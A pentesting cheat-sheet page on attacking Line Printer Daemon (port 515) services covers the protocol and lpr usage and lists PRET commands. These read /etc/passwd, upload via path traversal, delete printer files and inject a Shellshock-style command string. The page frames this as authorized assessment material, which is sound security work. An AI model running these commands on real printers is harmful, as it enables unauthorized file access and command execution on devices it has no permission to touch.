daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

515-pentesting-line-printer-daemon-lpd.md (3604B)


      1 ---
      2 title: "515 - Pentesting Line Printer Daemon (LPD)"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # 515 - Pentesting Line Printer Daemon (LPD)
     14 
     15 ## Introduction to LPD
     16 
     17 RFC 1179 documents the Berkeley Line Printer Daemon protocol. It is TCP-based, listens on port **515** by convention, and supports queue inspection, job submission, and job removal. A submitted job contains a control file describing the job and a data file containing the printable content.<sup>[[1]](#references)</sup>
     18 
     19 The RFC describes the wire protocol, but printer languages and file-handling behavior depend on the server and printer implementation. During an authorized assessment, enumerate queue names and capabilities before sending test jobs; avoid destructive filesystem or command tests against production printers.
     20 
     21 An LPD data file may be interpreted as PostScript, PJL, or another printer language. On devices that expose powerful language extensions, a malicious print job can therefore reach functionality beyond ordinary printing; the available filesystem, memory, or command primitives are model- and implementation-specific.<sup>[[2]](#references)[[3]](#references)</sup>
     22 
     23 LPRng is a well-known Unix-like implementation of the Berkeley printing system. Its suite includes the `lpd` server and clients such as `lpr`, `lpq`, and `lprm`.<sup>[[4]](#references)</sup> A standard `lpr` client can submit a benign test file when the queue name is known; for example, Windows uses:<sup>[[5]](#references)</sup>
     24 
     25 ```batch
     26 lpr -S <host> -P <queue> -o test.txt
     27 ```
     28 
     29 The Hacking Printers wiki remains a useful catalog of printer languages, protocols, attack classes, and device-specific research beyond the LPD-focused commands on this page.<sup>[[6]](#references)</sup>
     30 
     31 ## PRET LPD tools
     32 
     33 [PRET](https://github.com/RUB-NDS/PRET) includes `lpdprint.py` for submitting print data and `lpdtest.py` for testing implementation-specific LPD behavior. The latter exposes potentially destructive operations; use them only where the target and action are explicitly authorized.<sup>[[2]](#references)</sup>
     34 
     35 ```bash
     36 # To print a file to an LPD printer
     37 lpdprint.py hostname filename
     38 # To get a file from the printer
     39 lpdtest.py hostname get /etc/passwd
     40 # To upload a file to the printer
     41 lpdtest.py hostname put ../../etc/passwd
     42 # To remove a file from the printer
     43 lpdtest.py hostname rm /some/file/on/printer
     44 # To execute a command injection on the printer
     45 lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
     46 # To send a mail through the printer
     47 lpdtest.py hostname mail lpdtest@mailhost.local
     48 ```
     49 
     50 ## Shodan
     51 
     52 - `port 515`
     53 
     54 ## References
     55 
     56 - [1] [RFC 1179 - Line Printer Daemon Protocol](https://www.rfc-editor.org/rfc/rfc1179.html)
     57 - [2] [PRET - Printer Exploitation Toolkit](https://github.com/RUB-NDS/PRET)
     58 - [3] [Ruhr University Bochum - SoK: Exploiting Network Printers](https://www.nds.rub.de/research/publications/sok-exploiting-network-printers/)
     59 - [4] [LPRng documentation](https://lprng.sourceforge.net/docs.html)
     60 - [5] [Microsoft Learn - `lpr` command](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/lpr)
     61 - [6] [Hacking Printers Wiki](http://hacking-printers.net/wiki/index.php/Main_Page)